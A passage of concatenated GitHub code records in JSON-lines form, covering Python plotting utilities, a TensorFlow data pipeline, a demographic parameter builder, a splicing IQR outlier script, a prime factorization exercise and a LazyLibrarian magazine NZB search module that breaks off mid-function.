plt.plot(k_eval_df['Epoch'], k_eval_df['Validation Loss'], label='Validation')\n plt.legend()\n name = str(run)+'_loss.png'\n plt.savefig(save_dir+'/plots/loss/'+name)\n plt.clf()\n\n # Plot points in margin\n plt.title('Points in Margin')\n plt.xlabel('Epoch')\n plt.ylabel('Points in Margin')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Train in Margin'], label='Train')\n plt.plot(k_eval_df['Epoch'], k_eval_df['Validation in Margin'], label='Validation')\n plt.legend()\n name = 'margin/'+str(run)+'_points_in_margin.png'\n plt.savefig(save_dir+'/plots'+'/'+name)\n plt.clf()\n\n\ndef plot_params(param_dict, save_dir, run):\n os.makedirs(save_dir+'/plots/parameters/'+str(run))\n plt.figure(figsize=(12,8))\n for name, params in param_dict.items():\n x = range(params.shape[1])\n for param_series in params:\n plt.plot(x, param_series)\n plt.title(name)\n plt.xlabel('Epoch')\n plt.ylabel('Weight')\n \n plt.savefig(save_dir+'/plots/parameters/'+str(run)+'/'+name+'.png', dpi=150)\n plt.clf()\n\n\ndef plot_confusion(train_confusion, valid_confusion, save_dir, run):\n try:\n plt.figure(figsize=(9,6))\n total_train = np.sum(train_confusion[0])\n total_valid = np.sum(valid_confusion[0])\n\n plt.title('Train Confusion Matrix')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,0,0]/total_train, label='True Negative')\n plt.plot(range(len(train_confusion)), train_confusion[:,0,1]/total_train, label='False Positive')\n plt.plot(range(len(train_confusion)), train_confusion[:,1,1]/total_train, label='True Positive')\n plt.plot(range(len(train_confusion)), train_confusion[:,1,0]/total_train, label='False Negative')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/train_confusion_'+str(run)+'.png')\n plt.clf()\n\n plt.title('Validation Confusion Matrix')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,0,0]/total_valid, label='True Negative')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,0,1]/total_valid, label='False Positive')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,1,1]/total_valid, label='True Positive')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,1,0]/total_valid, label='False Negative')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/valid_confusion_'+str(run)+'.png')\n plt.clf()\n\n plt.title('True Positive')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,1,1]/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,1,1]/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/true_positive_'+str(run)+'.png')\n plt.clf()\n\n plt.title('False Negative')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,1,0]/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,1,0]/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/false_negative_'+str(run)+'.png')\n plt.clf()\n\n plt.title('True Negative')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,0,0]/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,0,0]/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/true_negative_'+str(run)+'.png')\n plt.clf()\n\n plt.title('False Positive')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified')\n plt.plot(range(len(train_confusion)), train_confusion[:,0,1]/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), valid_confusion[:,0,1]/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/false_positive_'+str(run)+'.png')\n plt.clf()\n\n plt.title('Total Positive')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified Positive')\n plt.plot(range(len(train_confusion)), (train_confusion[:,0,1]+train_confusion[:,1,1])/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), (valid_confusion[:,0,1]+valid_confusion[:,1,1])/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/total_positive_'+str(run)+'.png')\n plt.clf()\n\n plt.title('Total Negative')\n plt.xlabel('Epoch')\n plt.ylabel('Percent Classified Negative')\n plt.plot(range(len(train_confusion)), (train_confusion[:,0,0]+train_confusion[:,1,0])/total_train, label='Train')\n plt.plot(range(len(valid_confusion)), (valid_confusion[:,0,0]+valid_confusion[:,1,0])/total_valid, label='Validation')\n plt.legend()\n plt.savefig(save_dir+'/plots/confusion/'+str(run)+'/total_negative_'+str(run)+'.png')\n plt.clf()\n except:\n print(\"Confusion matrices too small again?\")\n\n\ndef plot_classifications(train_pred, valid_pred, train_labels, valid_labels, test_correct, save_dir, run):\n sns.heatmap(train_pred)\n plt.title('Training Set Correct')\n plt.savefig(save_dir+'/classifications/'+str(run)+'_train_correct.png')\n plt.clf()\n sns.heatmap(valid_pred)\n plt.title('Validation Set Correct')\n plt.savefig(save_dir+'/classifications/'+str(run)+'_validation_correct.png')\n plt.clf()\n sns.heatmap(test_correct)\n plt.title('Test Set Correct Correct')\n plt.savefig(save_dir+'/classifications/'+str(run)+'_test_correct.png')\n plt.clf()\n\n train_pos_i = np.where(train_labels == 1)\n train_neg_i = np.where(train_labels == -1)\n train_correct_only_pos = train_pred[train_pos_i]\n train_correct_only_neg = train_pred[train_neg_i]\n sns.heatmap(train_correct_only_pos)\n plt.title('Training Set Correct Positive')\n plt.savefig(save_dir+'/classifications/only_pos/'+str(run)+'_train_correct.png')\n plt.clf()\n sns.heatmap(train_correct_only_neg)\n plt.title('Training Set Correct Negative')\n plt.savefig(save_dir+'/classifications/only_neg/'+str(run)+'_train_correct.png')\n plt.clf()\n\n valid_pos_i = np.where(valid_labels == 1)\n valid_neg_i = np.where(valid_labels == -1)\n valid_correct_only_pos = valid_pred[valid_pos_i]\n valid_correct_only_neg = valid_pred[valid_neg_i]\n sns.heatmap(valid_correct_only_pos)\n plt.title('Validation Set Correct Positive')\n plt.savefig(save_dir+'/classifications/only_pos/'+str(run)+'_valid_correct.png')\n plt.clf()\n sns.heatmap(valid_correct_only_neg)\n plt.title('Validation Set Correct Negative')\n plt.savefig(save_dir+'/classifications/only_neg/'+str(run)+'_valid_correct.png')\n plt.clf()","repo_name":"T-Muha/senior-design-GNNs-for-FC-fingerprinting","sub_path":"pipeline/utils/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9984595332","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom sklearn.utils import shuffle\nfrom sklearn.model_selection import train_test_split\n\nfrom constants import *\n\n\ndef data_loader(sales_df, calendar_df):\n def window(x):\n sale = np.expand_dims(timesales[x[0], x[1]:batch_size + x[1]], axis=-1)\n info = infos[x[0]]\n day = info_day[x[1]:batch_size + x[1]]\n return np.concatenate([sale, day], axis=1), info, sale[::-1]\n\n timesales = sales_df[[\n \"d_\" + str(i) for i in range(firstDay, lastDay)]].values.astype(\"float32\")\n infos = sales_df[[\"enc_store_id\", \"enc_item_id\"]].values\n info_day = calendar_df[[\"cenc_year\", \"cenc_month\",\n \"cenc_weekday\", \"cenc_event_name_1\"]].values\n\n index = np.zeros([len(timesales), len(timesales[0]) - batch_size - 1],\n dtype=\"int32\")\n index = np.array(np.where(index == 0), dtype=\"int32\").T\n index = shuffle(index, random_state=0)\n\n train_idx, val_idx = train_test_split(index, test_size=0.2)\n\n # ------- tensorflow data pipe settings ------\n train_ds = tf.data.Dataset.from_tensor_slices(train_idx)\n train_ds = train_ds.shuffle(buffer_size=1000000)\n train_ds = train_ds.map(lambda x: tf.py_function(\n window, [x], [tf.float32, tf.float32, tf.float32]))\n train_ds = train_ds.batch(batch_size).prefetch(buffer_size=AUTOTUNE)\n\n val_ds = tf.data.Dataset.from_tensor_slices(val_idx)\n val_ds = val_ds.map(lambda x: tf.py_function(\n window, [x], [tf.float32, tf.float32, tf.float32]))\n val_ds = val_ds.batch(512).prefetch(buffer_size=AUTOTUNE)\n return train_ds, val_ds\n","repo_name":"gpi-yama/LSTM_embedder_for_kaggle","sub_path":"datapipe.py","file_name":"datapipe.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19951416591","text":"#! /usr/bin/env python\n\n\n\nimport argparse\nimport logging\nimport os\nimport sys\nimport population\nimport ipp_macro_series_parser.scripts.demographic_projections_downloader as dpd\nfrom ipp_macro_series_parser.config import Config\n\napp_name = os.path.splitext(os.path.basename(__file__))[0]\nlog = logging.getLogger(app_name)\n\n\ndef run_all(pop_input_dir = None, til_input_dir = None, uniform_weight = None, parameters_dir = None, til = False):\n if parameters_dir is None:\n parameters_dir = os.getcwd()\n\n if til_input_dir is not None:\n import dependance\n assert uniform_weight is not None\n dependance_output_dir = os.path.join(\n parameters_dir,\n \"dependance\"\n )\n dependance.build_prevalence_2010(\n input_dir = til_input_dir,\n output_dir = dependance_output_dir,\n uniform_weight = uniform_weight\n )\n dependance.build_prevalence_all_years(\n input_dir = til_input_dir,\n output_dir = dependance_output_dir,\n to_csv = True\n )\n\n population_output_dir = os.path.join(parameters_dir, \"population\")\n population.build_mortality_rates(\n input_dir = pop_input_dir,\n output_dir = population_output_dir,\n to_csv = True,\n uniform_weight = uniform_weight\n )\n\n population.build_deaths(\n input_dir = pop_input_dir,\n output_dir = population_output_dir,\n to_csv = True,\n uniform_weight = uniform_weight\n )\n\n population.build_fertility_rates(\n input_dir = pop_input_dir,\n output_dir = population_output_dir,\n to_csv = True,\n uniform_weight = uniform_weight\n )\n\n population.build_migration(\n input_dir = pop_input_dir,\n output_dir = population_output_dir,\n to_csv = True,\n uniform_weight = uniform_weight\n )\n\n population.rescale_migration(\n input_dir = pop_input_dir,\n output_dir = population_output_dir,\n )\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-d', '--download', action = 'store_true',\n help = \"download all input files from their web sources\")\n parser.add_argument('-v', '--verbose', action = 'store_true', default = False, help = \"increase output verbosity\")\n parser.add_argument('-o', '--output', type = str, default = None, help = \"output directory\")\n parser.add_argument('-p', '--pop_input', type = str, default = None, help = \"input directory for population files\")\n parser.add_argument('-w', '--weight', default = 200, help = \"weight used for TIL-France\")\n # TODO remove weight from here\n parser.add_argument('-t', '--til_input', default = None,\n help = \"input directory for til-specific files (dependance)\")\n args = parser.parse_args()\n\n logging.basicConfig(\n level = logging.DEBUG if args.verbose else logging.WARNING,\n stream = sys.stdout)\n\n if not os.path.isabs(args.output):\n output_dir = os.path.abspath(args.output)\n else:\n output_dir = args.output\n\n if not os.path.exists(output_dir):\n log.info('Creating directory {}'.format(output_dir))\n os.makedirs(output_dir)\n\n if args.download and (args.til_input or args.pop_input):\n parser.error(\"-d cannot be used with -p nor -t\")\n sys.exit(-1)\n\n if args.til_input and not args.weight:\n print(\"--weight 200 used by default\")\n\n if args.download:\n dpd.main()\n files = ['insee_projections', 'drees_dependance']\n output_dirs_by_file = {file: Config().get('data', file) for file in files}\n pop_input = output_dirs_by_file['insee_projections']\n til_input = output_dirs_by_file['drees_dependance']\n\n else:\n pop_input = os.path.abspath(args.pop_input)\n assert os.path.exists(pop_input)\n\n til_input = args.til_input\n\n if til_input is not None:\n til_input = os.path.abspath(args.til_input)\n assert os.path.exists(til_input)\n else:\n til_input = None\n\n run_all(\n pop_input_dir = pop_input,\n til_input_dir = til_input,\n parameters_dir = output_dir,\n uniform_weight = int(args.weight),\n )\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"taxipp/ipp-macro-series-parser","sub_path":"ipp_macro_series_parser/demographie/build_parameters.py","file_name":"build_parameters.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"41053336790","text":"\"\"\" author: mcatamur@ucsc.edu \"\"\"\n\n\n\"\"\"\nSample Command: python IQR_tissue_outlier.py -i juncBase_table.txt/tsv\n\"\"\"\n\n#!/usr/bin/env python3\n\n\nimport csv, time, argparse\nstart_time = time.time()\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\n\n\n\nclass CommandLine() :\n '''\n Takes input file and options.\n '''\n def __init__(self, inOpts=None) :\n '''\n CommandLine constructor.\n Implements a parser to interpret the command line argv string using argparse.\n '''\n self.parser = argparse.ArgumentParser(description = 'outputAnalyzer.py arguments',\n epilog = 'For more help contact: ',\n add_help = True, #default is True\n prefix_chars = '-',\n usage = '%(prog)s [options] -option1[default]'\n )\n self.parser.add_argument('-i', '--inputFile', action = 'store', help = 'input file')\n self.parser.add_argument('-dPSI','--delta_PSI', type=int, action = 'store', help = 'delta PSI threshold', default=10.0)\n\n if inOpts is None :\n self.args = self.parser.parse_args()\n else :\n self.args = self.parser.parse_args(inOpts)\n\nclass outputAnalyzer() :\n\n def __init__(self, myCommandLine):\n self.inputFile = myCommandLine.args.inputFile\n self.dPSI = myCommandLine.args.delta_PSI\n self.findTissueIndex(self.inputFile)\n self.buildData_tissue(self.inputFile)\n self.plotEventsBar_allTissue()\n\n def findTissueIndex(self, inputFile):\n print(\"Building tissue index...\")\n self.tissue_index = defaultdict(list)\n\n with open(self.inputFile) as file:\n tsvReader = csv.reader(file, dialect = 'excel-tab')\n self.header = next(tsvReader, None)\n for ccle in range(11,len(self.header)-1): #index of cell lines\n a = self.header[ccle].split(\"-\") #split ccle tag\n if a[0] == 'BI':\n # Hard code four letter codes\n if a[1] == 'LUSC':\n self.tissue_index['LUNG'].append(ccle)\n if a[1] == 'LCLL':\n self.tissue_index['LCLL'].append(ccle)\n if a[1] == 'DLBC':\n self.tissue_index['DLBC'].append(ccle)\n if a[1] == 'MM':\n self.tissue_index['MM'].append(ccle)\n if a[1] == 'LGG':\n self.tissue_index['CENTRAL_NERVOUS_SYSTEM'].append(ccle)\n if a[1] == 'BRCA':\n self.tissue_index['BREAST'].append(ccle)\n if a[1] == 'COAD':\n self.tissue_index['LARGE_INTESTINE'].append(ccle)\n if a[1] == 'SARC':\n self.tissue_index['BONE_AND_SOFT_TISSUE'].append(ccle)\n if a[1] == 'OV':\n self.tissue_index['OVARY'].append(ccle)\n if a[1] == 'SKCM':\n self.tissue_index['SKIN'].append(ccle)\n if a[1] == 'PAAD':\n self.tissue_index['PANCREAS'].append(ccle)\n if a[1] == 'HNSC':\n self.tissue_index['UPPER_AERODIGESTIVE_TRACT'].append(ccle)\n if a[1] == 'KIRC':\n self.tissue_index['KIDNEY'].append(ccle)\n if a[1] == 'CESC':\n self.tissue_index['CERVICAL'].append(ccle)\n if a[1] == 'BLCA':\n self.tissue_index['URINARY_TRACT'].append(ccle)\n if a[1] == 'ESCA':\n self.tissue_index['OESOPHAGUS'].append(ccle)\n if a[1] == 'LIHC':\n self.tissue_index['BILIARY'].append(ccle)\n if a[1] == 'STAD':\n self.tissue_index['STOMACH'].append(ccle)\n if a[1] == 'THCA':\n self.tissue_index['THYROID'].append(ccle)\n if a[1] == 'PRAD':\n self.tissue_index['PROSTATE'].append(ccle)\n if a[1] == 'MESO':\n self.tissue_index['MESOTHELIOMA'].append(ccle)\n\n else:\n pass\n\n\n #for item in self.tissue_index:\n #print (item, len(self.tissue_index[item]))\n\n self.total_tissue_outlier_counts = {key:0 for key, value in self.tissue_index.items()}\n\n #len(self.tissue_outlier_counts[key]) should equal len(self.tissue_index[key])\n\n def buildData_tissue(self, inputFile):\n print(\"Building IQR data..\")\n #loop through the IQR method here\n with open(self.inputFile) as file:\n tsvReader = csv.reader(file, dialect = 'excel-tab')\n next(tsvReader, None)\n row_num = 0\n for row in tsvReader:\n print(row_num)\n for tissue_type in self.tissue_index:\n if len(self.tissue_index[tissue_type]) >= 7:\n self.doIQR_part1(tissue_type, row)\n else:\n pass\n row_num += 1\n\n\n def doIQR_part1(self, tissue_type, row):\n psi_values = []\n for index in self.tissue_index[tissue_type]:\n try:\n psi_values.append(float(row[index]))\n except ValueError:\n continue\n\n\n psi_values.sort(key = int)\n row_len = len(psi_values)\n\n if (row_len % 2) != 0 and row_len > 7:\n q2 = psi_values[(row_len//2) + 1]\n q1 = (psi_values[(row_len//2)//2] + psi_values[((row_len//2)//2)-1]) / 2\n q3 = (psi_values[(row_len//2) + ((row_len//2)//2)] + psi_values[(row_len//2) + (((row_len//2)//2)+1)]) / 2\n self.doIQR_part2(psi_values, tissue_type, q1, q2, q3, row)\n\n elif row_len == 7: #Special case\n q2 = psi_values[(row_len//2) + 1]\n q1 = psi_values[(row_len//2)//2]\n q3 = psi_values[(row_len//2)+(((row_len//2)//2)+1)]\n self.doIQR_part2(psi_values, tissue_type, q1, q2, q3, row)\n\n elif (row_len % 2) == 0 and row_len >= 8:\n q2 = (psi_values[row_len//2] + psi_values[(row_len//2) - 1]) / 2\n if (row_len//2) % 2 == 0:\n q1 = psi_values[((row_len//2)//2) - 1]\n q3 = psi_values[(row_len//2) + (((row_len//2)//2)+1)]\n self.doIQR_part2(psi_values, tissue_type, q1, q2, q3, row)\n elif (row_len//2) % 2 != 0:\n q1 = psi_values[(row_len//2)//2]\n q3 = psi_values[(row_len//2)+(((row_len//2)//2)+1)]\n self.doIQR_part2(psi_values, tissue_type, q1, q2, q3, row)\n\n elif row_len <= 6:\n pass\n\n\n def doIQR_part2(self, psi_values, tissue, q1, q2, q3, row):\n\n iqr = q3-q1\n\n #instead of indexing through the psi_values, let's go by the tissue index instead\n #that way we can also acces to which cell line the value belonged to\n\n index = self.tissue_index[tissue]\n\n for i in range(11,len(self.header)-1):\n if i in index:\n try:\n if float(row[i]) < (q1-1.5*iqr) or float(row[i]) > (q3+1.5*iqr):\n if (q2-float(row[i])) > self.dPSI or (float(row[i])-q2) > self.dPSI:\n self.total_tissue_outlier_counts[tissue] += 1\n else:\n pass\n else:\n pass\n except ValueError:\n pass\n\n\n\n\n\n\n def plotEventsBar_allTissue(self):\n print(self.total_tissue_outlier_counts)\n print(self.tissue_index['BREAST'])\n self.colors = ['#FFD54F', '#FFF176', '#81C784', '#4DD0E1', '#64B5F6', '#9575CD', '#F06292', '#EF5350', '#FF8A65', '#A1887F','#90A4AE']\n tuple_tissue_events = list(self.total_tissue_outlier_counts.items())\n for tissue in tuple_tissue_events: #(event, counts)\n plt.bar((tuple_tissue_events.index(tissue)), height = tissue[1], color = self.colors[6], label = tissue[0] )\n #plt.bar((x+1.5), height = f_events[x][1], color = self.colors[x], label = f_events[x][0])\n #print (event)\n #print (f_events.index(event))\n #print (self.filteredEvents[event[1]])\n\n\n plt.xticks(range(len(self.total_tissue_outlier_counts)), list(self.total_tissue_outlier_counts.keys()), rotation='vertical')\n plt.title('Outlier Splicing Events across all tissue types with dPSI > %s' % (str(self.dPSI)))\n plt.ylabel('Outlier Splicing Counts')\n figname_events_bar = 'all_tissue_types_events_bar_IQR_adjust.png'\n plt.savefig(figname_events_bar)\n plt.show()\n\n\ndef main(myCommandLine=None):\n '''\n Creates an object of the ourputAnalyzer class and passes command line arguments to that classs\n\n '''\n myCommandLine = CommandLine(myCommandLine)\n myFileReader = outputAnalyzer(myCommandLine)\n print(\"Your runtime was %s seconds.\" % (time.time() - start_time))\n\nmain()\n","repo_name":"mcatamur/splicing_modulators","sub_path":"IQR/IQR_BI_only.py","file_name":"IQR_BI_only.py","file_ext":"py","file_size_in_byte":9336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32065592244","text":"#Задайте натуральное число N. Напишите программу, которая составит список простых множителей числа N.\n\n\ndef Factorization(n):\n list = []\n a = 2 # начинаем с 2, т.к. 1 не считается простым числом\n while a * a <= n: # при таком условии исключит из списка 1\n if n % a == 0:\n list.append(a)\n n //= a\n else:\n a += 1\n if a > 1:\n list.append(n)\n return list\n\nN = int(input('Введите натуральное число: '))\n\nprint(f'Простые множители числа {N}: {Factorization(N)}')\n\n# Альтернативное решение\n# num = int(input(\"Введите число: \"))\n# i = 2 # первое простое число\n# lst = []\n# old = num\n# while i <= num:\n# if num % i == 0:\n# lst.append(i)\n# num //= i\n# i = 2\n# else:\n# i += 1\n# print(f\"Простые множители числа {old} приведены в списке: {lst}\")\n","repo_name":"rinakinsha/PythonHW4","sub_path":"Task2/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10858788841","text":"import time, threading, urllib, urllib2, os, re\n\nfrom xml.etree import ElementTree\nfrom xml.etree.ElementTree import Element, SubElement\n\nimport lazylibrarian\n\nfrom lazylibrarian import logger, database, formatter, providers, sabnzbd, SimpleCache, notifiers\n\nimport lib.fuzzywuzzy as fuzzywuzzy\nfrom lib.fuzzywuzzy import fuzz, process\n\ndef searchmagazines(mags=None):\n\tmaglist = []\n\tmyDB = database.DBConnection()\n\tsearchlist = []\n\n\tthreading.currentThread().name = \"SEARCHMAGS\"\n\n\n\tif mags is None:\n\t\tsearchmags = myDB.select('SELECT Title, Frequency, LastAcquired, IssueDate from magazines WHERE Status=\"Active\"')\n\telse:\n\t\tsearchmags = []\n\t\tfor magazine in mags:\n\t\t\tsearchmags_temp = myDB.select('SELECT Title, Frequency, LastAcquired, IssueDate from magazines WHERE Title=? AND Status=\"Active\"', [magazine['bookid']])\n\t\t\tfor terms in searchmags_temp:\n\t\t\t\tsearchmags.append(terms)\n\n\tfor searchmag in searchmags:\n\t\tbookid = searchmag[0]\n\t\tsearchterm = searchmag[0]\n\t\tfrequency = searchmag[1]\n\t\tlast_acquired = searchmag[2]\n\t\tissue_date = searchmag[3]\n\n\t\tdic = {'...':'', ' & ':' ', ' = ': ' ', '?':'', '$':'s', ' + ':' ', '\"':'', ',':'', '*':''}\n\n\t\tsearchterm = formatter.latinToAscii(formatter.replace_all(searchterm, dic))\n\t\tsearchterm = re.sub('[\\.\\-\\/]', ' ', searchterm).encode('utf-8')\n\t\tsearchlist.append({\"bookid\": bookid, \"searchterm\": searchterm})\n\n\tif not lazylibrarian.SAB_HOST and not lazylibrarian.BLACKHOLE:\n\t\tlogger.info('No download method is set, use SABnzbd or blackhole')\n\n\tif not lazylibrarian.NEWZNAB and not lazylibrarian.NEWZNAB2 and not lazylibrarian.USENETCRAWLER:\n\t\tlogger.info('No providers are set. try use NEWZNAB.')\n\n\tif searchlist == []:\n\t\tlogger.info('There is nothing to search for. Mark some magazines as active.')\n\n\tfor book in searchlist:\n\t\tresultlist = []\n\t\tif lazylibrarian.NEWZNAB:\n\t\t\tlogger.debug('Searching NZB\\'s at provider %s ...' % lazylibrarian.NEWZNAB_HOST)\n\t\t\tresultlist = providers.NewzNab(book, \"1\")\n\n\t\tif lazylibrarian.NEWZNAB2:\n\t\t\tlogger.debug('Searching NZB\\'s at provider %s ...' % lazylibrarian.NEWZNAB_HOST2)\n\t\t\tresultlist += providers.NewzNab(book, \"2\")\n\n\t\tif lazylibrarian.USENETCRAWLER: \n\t\t\tlogger.info('Searching NZB\\'s at provider UsenetCrawler ...')\n\t\t\tresultlist += providers.UsenetCrawler(book, 'mag')\n\n\t\t\t#AHHH pass the book not the search book - bloody names the same, so wrong keys passing over\n\n\t\tif not resultlist:\n\t\t\tlogger.debug(\"Adding book %s to queue.\" % book['searchterm'])\n\n\t\telse:\n\t\t\tbad_regex = 0\n\t\t\told_date = 0\n\t\t\ttotal_nzbs = 0\n\t\t\tnew_date = 0\n\t\t\tfor nzb in resultlist:\n\t\t\t\ttotal_nzbs = total_nzbs + 1\n\t\t\t\tbookid = nzb['bookid']\n\t\t\t\tnzbtitle = nzb['nzbtitle']\n\t\t\t\tnzburl = nzb['nzburl']\n\t\t\t\tnzbprov = nzb['nzbprov']\n\t\t\t\tnzbdate_temp = nzb['nzbdate']\n\t\t\t\tnzbsize_temp = nzb['nzbsize']\n\t\t\t\tnzbsize = str(round(float(nzbsize_temp) / 1048576,2))+' MB'\n\t\t\t\tnzbdate = formatter.nzbdate2format(nzbdate_temp)\n\n\t\t\t\tcheckifmag = myDB.select('SELECT * from magazines WHERE Title=?', [bookid])\n\t\t\t\tif checkifmag:\n\t\t\t\t\tfor results in checkifmag:\n\t\t\t\t\t\tcontrol_date = results['IssueDate']\n\t\t\t\t\t\tfrequency = results['Frequency']\n\t\t\t\t\t\tregex = results['Regex']\n\n\t\t\t\t\tnzbtitle_formatted = nzb['nzbtitle'].replace('.',' ').replace('/',' ').replace('+',' ').replace('_',' ').replace('(','').replace(')','')\n\t\t\t\t\t#Need to make sure that substrings of magazine titles don't get found (e.g. Maxim USA will find Maximum PC USA)\n\t\t\t\t\tkeyword_check = nzbtitle_formatted.replace(bookid,'')\n\t\t\t\t\t#remove extra spaces if they're in a row\n\t\t\t\t\tnzbtitle_exploded_temp = \" \".join(nzbtitle_formatted.split())\n\t\t\t\t\tnzbtitle_exploded = nzbtitle_exploded_temp.split(' ')\n\n\t\t\t\t\tbookid_exploded = bookid.split(' ')\n\n\t\t\t\t\t#Make sure that NZB contains exact magazine phrase, and that NZB title begins with magazine title\n\t\t\t\t\t#logger.debug('[%s] !=[%s] & [%s] == [%s]' %(keyword_check.lower(),nzbtitle_formatted.lower(),nzbtitle_exploded[0].lower(),bookid_exploded[0].lower()))\n\t\t\t\t\tif keyword_check.lower() != nzbtitle_formatted.lower() and nzbtitle_exploded[0].lower() == bookid_exploded[0].lower():\n\t\t\t\t\t\t\n\t\t\t\t\t\tif len(nzbtitle_exploded) > 1:\n\t\t\t\t\t\t\t#regexA = DD MonthName YYYY OR MonthName YYYY\n\t\t\t\t\t\t\tregexA_year = nzbtitle_exploded[len(nzbtitle_exploded)-1]\n\t\t\t\t\t\t\tregexA_month_temp = nzbtitle_exploded[len(nzbtitle_exploded)-2]\n\t\t\t\t\t\t\tregexA_month = formatter.month2num(regexA_month_temp)\n\n\t\t\t\t\t\t\tif frequency == \"Weekly\" or frequency == \"BiWeekly\":\n\t\t\t\t\t\t\t\tregexA_day = nzbtitle_exploded[len(nzbtitle_exploded)-3].zfill(2)\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tregexA_day = '01'\n\t\t\t\t\t\t\tnewdatish_regexA = regexA_year+regexA_month+regexA_day\n\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tint(newdatish_regexA)\n\t\t\t\t\t\t\t\tnewdatish = regexA_year+'-'+regexA_month+'-'+regexA_day\n\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t#regexB = MonthName DD YYYY\n\t\t\t\t\t\t\t\tregexB_year = nzbtitle_exploded[len(nzbtitle_exploded)-1]\n\t\t\t\t\t\t\t\tregexB_day = nzbtitle_exploded[len(nzbtitle_exploded)-2].zfill(2)\n\t\t\t\t\t\t\t\tregexB_month_temp = nzbtitle_exploded[len(nzbtitle_exploded)-3]\n\t\t\t\t\t\t\t\tregexB_month = formatter.month2num(regexB_month_temp)\n\t\t\t\t\t\t\t\tnewdatish_regexB = regexB_year+regexB_month+regexB_day\n\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\tint(newdatish_regexB)\n\t\t\t\t\t\t\t\t\tnewdatish = regexB_year+'-'+regexB_month+'-'+regexB_day\n\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t#regexC = YYYY-MM\n\t\t\t\t\t\t\t\t\tregexC_last = nzbtitle_exploded[len(nzbtitle_exploded)-1]\n\t\t\t\t\t\t\t\t\tregexC_exploded = regexC_last.split('-')\n\t\t\t\t\t\t\t\t\tif len(regexC_exploded) == 2:\n\t\t\t\t\t\t\t\t\t\tregexC_year = regexC_exploded[0]\n\t\t\t\t\t\t\t\t\t\tregexC_month = regexC_exploded[1].zfill(2)\n\t\t\t\t\t\t\t\t\t\tregexC_day = '01'\n\t\t\t\t\t\t\t\t\t\tnewdatish_regexC = regexC_year+regexC_month+regexC_day\n\t\t\t\t\t\t\t\t\telif len(regexC_exploded) == 3:\n\t\t\t\t\t\t\t\t\t\tregexC_year = regexC_exploded[0]\n\t\t\t\t\t\t\t\t\t\tregexC_month = regexC_exploded[1].zfill(2)\n\t\t\t\t\t\t\t\t\t\tregexC_day = regexC_exploded[2].zfill(2)\n\t\t\t\t\t\t\t\t\t\tnewdatish_regexC = regexC_year+regexC_month+regexC_day\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tnewdatish_regexC = 'Invalid'\n\n\t\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\t\tint(newdatish_regexC)\n\t\t\t\t\t\t\t\t\t\tnewdatish = regexC_year+'-'+regexC_month+'-'+regexC_day\n\t\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\t\tlogger.debug('NZB %s not in proper date format.' % nzbtitle_formatted)\n\t\t\t\t\t\t\t\t\t\tbad_regex = bad_regex + 1\n\t\t\t\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcontinue\n\n\t\t\t\t\t\t#Don't want to overwrite status = Skipped for NZBs that have been previously found\n\t\t\t\t\t\twanted_status = myDB.select('SELECT * from wanted WHERE NZBtitle=?', [nzbtitle])\n\t\t\t\t\t\tif wanted_status:\n\t\t\t\t\t\t\tfor results in wanted_status:\n\t\t\t\t\t\t\t\tstatus = 